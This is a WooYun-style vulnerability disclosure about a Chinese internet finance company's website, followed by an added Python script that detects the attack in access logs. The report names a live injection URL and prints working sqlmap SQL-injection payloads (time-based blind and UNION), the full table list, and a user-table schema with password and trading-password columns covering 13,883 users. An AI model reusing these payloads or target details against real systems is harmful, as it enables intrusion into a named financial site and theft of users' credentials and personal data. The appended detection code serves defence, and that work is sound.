WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
2015-09-27: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-11-11: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
深圳市合伙人互联网金融服务有限公司 (Shenzhen Hehuoren Internet Financial Services Co., Ltd.) was founded in 2014 with registered capital of 50 million yuan. Using the Internet as its medium and open, transparent information as its guiding principle, the company provides professional services for the funding needs of both investors and borrowers. The website has a SQL injection vulnerability that exposes data on more than ten thousand users.
Injection point: http://www.hhrfs.com/notice/index?p=*
117 tables are exposed.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.hhrfs.com:80/notice/index?p=') AND (SELECT * FROM (SELECT(SLEEP(5)))LSjn) AND ('HNdB'='HNdB

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: http://www.hhrfs.com:80/notice/index?p=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787671,0x56735877494e56485256,0x717a716b71),NULL,NULL,NULL-- 
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Database: hhr
[117 tables]
jee_activity, jee_activity_cdkey, jee_activity_gift, jee_admin_user, jee_advert, jee_advert_area, jee_article, jee_article_section, jee_autobid, jee_base_bank, jee_base_city, jee_base_industry, jee_choujiang, jee_contacts, jee_cooperation, jee_creditor, jee_creditor_bak, jee_creditor_info, jee_creditor_info_bak, jee_csai_project, jee_debtor, jee_debtor_bak, jee_debtor_info, jee_debtor_info_bak, jee_email, jee_email_log, jee_email_nosend, jee_entrust, jee_f_product, jee_f_product_group, jee_f_product_info, jee_f_product_order, jee_f_product_order_info, jee_f_product_set, jee_f_product_set_info, jee_feedback, jee_feedback_bug, jee_file_manager, jee_friend, jee_goods, jee_goods_categor, jee_goods_comment, jee_goods_order, jee_guarante, jee_guarante_bak, jee_guarante_bank, jee_guarante_bank_bak, jee_guarante_congruence, jee_guarante_contract, jee_guarante_group, jee_guarante_info, jee_guarante_info_bak, jee_guest, jee_guest_bind, jee_guest_check, jee_guest_check_head, jee_guest_comment, jee_guest_comment_head, jee_guest_money, jee_image_trade_struct, jee_index_money, jee_kaitong_city, jee_links, jee_log, jee_money_config, jee_notice, jee_order, jee_product, jee_project, jee_project_info, jee_qxcj,
jee_radar, jee_repo, jee_report_tmp_fee, jee_report_tmp_payplan, jee_report_tmp_userorder, jee_send_tpl, jee_seo, jee_service, jee_sms, jee_sms_log, jee_stamp, jee_subscribe, jee_supplier, jee_supplier_group, jee_supplier_info, jee_tmp_weekuser, jee_tpl_var, jee_user, jee_user_agent, jee_user_bank_bind, jee_user_csaiuser, jee_user_detail, jee_user_email_authentic, jee_user_getmoney, jee_user_group, jee_user_income, jee_user_income_gift, jee_user_income_gift_roll, jee_user_income_grow, jee_user_income_point, jee_user_login_log, jee_user_name_authbank, jee_user_name_authentic, jee_user_name_authweb, jee_user_offline_info, jee_user_phone_authentic, jee_user_property, jee_user_recharge, jee_user_recharge_offline, jee_user_relation, jee_user_study, jee_user_takeadd, jee_user_temp, jee_user_withdrawal, jee_user_work, jee_user_wx
13,883 user records are exposed.
sqlmap resumed the following injection point(s) from stored session (same injection point as above):
---
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0.12
Database: hhr
Table: jee_user
[28 columns]
+----------------------------+---------------+
| Column                     | Type          |
+----------------------------+---------------+
| level                      | int(11)       |
| agent_time                 | int(11)       |
| agent_userid               | int(11)       |
| cpa_amount                 | decimal(13,2) |
| cpa_firstinvesttime        | int(11)       |
| create_time                | int(11)       |
| email                      | varchar(50)   |
| gift_money                 | decimal(13,2) |
| grow_up                    | int(11)       |
| hits                       | int(11)       |
| id                         | int(11)       |
| isagent                    | tinyint(1)    |
| login_ip                   | varchar(15)   |
| login_time                 | int(11)       |
| money                      | decimal(13,2) |
| password                   | char(32)      |
| phone                      | varchar(15)   |
| point                      | int(11)       |
| reg_from                   | varchar(50)   |
| reg_ip                     | varchar(20)   |
| reg_result                 | varchar(50)   |
| remark                     | varchar(100)  |
| stand_guard_total_interest | decimal(10,2) |
| status                     | tinyint(1)    |
| tid_code                   | varchar(50)   |
| trading_password           | char(32)      |
| true_name                  | varchar(50)   |
| user_name                  | varchar(50)   |
+----------------------------+---------------+

Database: hhr
+----------+---------+
| Table    | Entries |
+----------+---------+
| jee_user | 13883   |
+----------+---------+
The exposed user data includes email addresses, phone numbers, passwords, real names, usernames, trading passwords and more.
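A detection check a defender of this site would want, added here as an example and not part of the original WooYun report: it parses constructed access-log lines (the client IPs and timestamps are made up) whose query strings carry the two sqlmap payloads quoted above, URL-encoded as they would appear on the wire, and flags the time-based blind and UNION patterns in the decoded `p` parameter.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample log (common log format): one benign request to the
# vulnerable endpoint, then the two payloads from the report, URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Sep/2015:10:00:01 +0800] "GET /notice/index?p=2 HTTP/1.1" 200 5120
203.0.113.5 - - [27/Sep/2015:10:00:07 +0800] "GET /notice/index?p=%27%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29LSjn%29%20AND%20%28%27HNdB%27%3D%27HNdB HTTP/1.1" 200 5120
203.0.113.5 - - [27/Sep/2015:10:00:09 +0800] "GET /notice/index?p=%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7178787671%2C0x56735877494e56485256%2C0x717a716b71%29%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1" 200 6231
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (label, regex over the decoded, lower-cased parameter value).
# Ordered from most to least specific so the first label is the strongest signal.
RULES = [
    ("time_based_blind", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("quote_breakout", re.compile(r"'\s*\)?\s*(and|or)\b")),
]


def decode_params(url):
    """Return [(name, decoded value)] for a request URL's query string.
    parse_qsl decodes once; unquote_plus runs again so double-encoded
    payloads are also inspected in their plain form."""
    query = urlsplit(url).query
    return [(k, unquote_plus(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def scan_log(text):
    """Return one finding per request whose parameter value matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name, value in decode_params(m.group("url")):
            hits = [label for label, rx in RULES if rx.search(value.lower())]
            if hits:
                findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                                 "param": name, "rules": hits, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["param"], ",".join(f["rules"]))
```

Both payloads are caught on the decoded value, which is why decoding before matching matters: the raw `%27%29%20AND` form would not match a plain-text rule.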
Could not reach the vendor, or the vendor actively refused to respond.